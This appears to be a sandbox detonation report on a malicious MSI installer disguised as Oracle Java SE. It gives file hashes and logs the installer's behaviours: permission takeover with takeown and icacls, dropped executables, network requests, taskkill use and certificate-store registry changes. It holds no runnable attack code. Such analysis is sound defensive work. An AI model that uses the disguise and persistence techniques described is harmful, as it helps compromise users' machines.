| SHA512 | 86e7137c74e7522fb5a13b4f8473d8fbd57d90d3da6b54b0d0fc42d449f6f59887b8ad48b29779bbf3b3a5e89219bf874897aeac64a2718c539c38c6004f693c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6525274CBC2077D43D7D17A33C868C4F
| MD5 | d5e98140c51869fc462c8975620faa78 |
| SHA1 | 07e032e020b72c3f192f0628a2593a19a70f069e |
| SHA256 | 5c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e |
| SHA512 | 9bd164cc4b9ef07386762d3775c6d9528b82d4a9dc508c3040104b8d41cfec52eb0b7e6f8dc47c5021ce2fe3ca542c4ae2b54fd02d76b0eabd9724484621a105 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6525274CBC2077D43D7D17A33C868C4F
| MD5 | aecbc3ea574af22e388ebfb340db35e9 |
| SHA1 | 3d00105e58eed12a2bf2340efe22e6a3a47d578a |
| SHA256 | 5866d50e054c8a7cfefa93ad2ddfc27a3684dd303726ac5e52ab3afb43360824 |
| SHA512 | 45a72f343c06b93497b5f0648c1cd3767eef3488eef9d52522c3f9540f08de7779d2572ee8b5deb255ac1c6416c395fcd88d8b3edb7b18c015d52e89aad157d4 |
C:\Windows\Installer\MSICC51.tmp
| MD5 | a3ae5d86ecf38db9427359ea37a5f646 |
| SHA1 | eb4cb5ff520717038adadcc5e1ef8f7c24b27a90 |
| SHA256 | c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74 |
| SHA512 | 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0 |
\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
| MD5 | a27bdbc102aa90a99bc5538bb271b4d3 |
| SHA1 | eb18ea9eee793aa76eab49feea0e6490c4ded61e |
| SHA256 | e85b4b2991b3772ab7bfaf0012fe5dfd754fd0c3661466e556b20f5ca8f2b4de |
| SHA512 | cc0cbdc74b419a77f8250cd80f68af5b227383ee904707187b8971d3ed478cb80edcf7ab27390e34be65b599fb214925577afecc6e82d41db9000c50f71da421 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll
| MD5 | 9dda681b0406c3575e666f52cbde4f80 |
| SHA1 | 1951c5b2c689534cdc2fbfbc14abbf9600a66086 |
| SHA256 | 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3 |
| SHA512 | 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll
| MD5 | e008fbfdea1bf873f3d94d74c1cf7935 |
| SHA1 | 2a2af5e9084e7b55cdd5d01df342b02c1917573c |
| SHA256 | 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b |
| SHA512 | 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | fb0ca6cbfff46be87ad729a1c4fde138 |
| SHA1 | 2c302d1c535d5c40f31c3a75393118b40e1b2af9 |
| SHA256 | 1ee8e99190cc31b104fb75e66928b8c73138902fefedbcfb54c409df50a364df |
| SHA512 | 99144c67c33e89b8283c5b39b8bf68d55638daa6acc2715a2ac8c5dba4170dd12299d3a2dffb39ae38ef0872c2c68a64d7cdc6ceba5e660a53942761cb9eca83 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | c9a55de62e53d747c5a7fddedef874f9 |
| SHA1 | c5c5a7a873a4d686bfe8e3da6dc70f724ce41bad |
| SHA256 | b5c725bbb475b5c06cc6cb2a2c3c70008f229659f88fba25ccd5d5c698d06a4b |
| SHA512 | adca0360a1297e80a8d3c2e07f5fbc06d2848f572f551342ad4c9884e4ab4bd1d3b3d9919b4f2b929e2848c1a88a4e844dd38c86067cace9685f9640db100efb |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll
| MD5 | 3f224766fe9b090333fdb43d5a22f9ea |
| SHA1 | 548d1bb707ae7a3dfccc0c2d99908561a305f57b |
| SHA256 | ae5e73416eb64bc18249ace99f6847024eceea7ce9c343696c84196460f3a357 |
| SHA512 | c12ea6758071b332368d7ef0857479d2b43a4b27ceeab86cbb542bd6f1515f605ea526dfa3480717f8f452989c25d0ee92bf3335550b15ecec79e9b25e66a2ca |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 23bd405a6cfd1e38c74c5150eec28d0a |
| SHA1 | 1d3be98e7dfe565e297e837a7085731ecd368c7b |
| SHA256 | a7fa48de6c06666b80184afee7e544c258e0fb11399ab3fe47d4e74667779f41 |
| SHA512 | c52d487727a34fbb601b01031300a80eca7c4a08af87567da32cb5b60f7a41eb2cae06697cd11095322f2fc8307219111ee02b60045904b5c9b1f37e48a06a21 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 6e704280d632c2f8f2cadefcae25ad85 |
| SHA1 | 699c5a1c553d64d7ff3cf4fe57da72bb151caede |
| SHA256 | 758a2f9ef6908b51745db50d89610fe1de921d93b2dbea919bfdba813d5d8893 |
| SHA512 | ade85a6cd05128536996705fd60c73f04bab808dafb5d8a93c45b2ee6237b6b4ddb087f1a009a9d289c868c98e61be49259157f5161feccf9f572fd306b460e6 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 95c5b49af7f2c7d3cd0bc14b1e9efacb |
| SHA1 | c400205c81140e60dffa8811c1906ce87c58971e |
| SHA256 | ff9b51aff7fbec8d7fe5cc478b12492a59b38b068dc2b518324173bb3179a0e1 |
| SHA512 | f320937b90068877c46d30a15440dc9ace652c3319f5d75e0c8bb83f37e78be0efb7767b2bd713be6d38943c8db3d3d4c3da44849271605324e599e1242309c3 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll
| MD5 | 79ee4a2fcbe24e9a65106de834ccda4a |
| SHA1 | fd1ba674371af7116ea06ad42886185f98ba137b |
| SHA256 | 9f7bda59faafc8a455f98397a63a7f7d114efc4e8a41808c791256ebf33c7613 |
Analysis: behavioral2
Detonation Overview
Submitted: 2024-10-16 08:21
Reported: 2024-10-16 08:24
Platform: win10v2004-20241007-en
Max time kernel: 142s
Max time network: 122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e57762a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7772.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57762c.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7BDA.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57762a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI77C1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI79E5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Loads dropped DLL
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
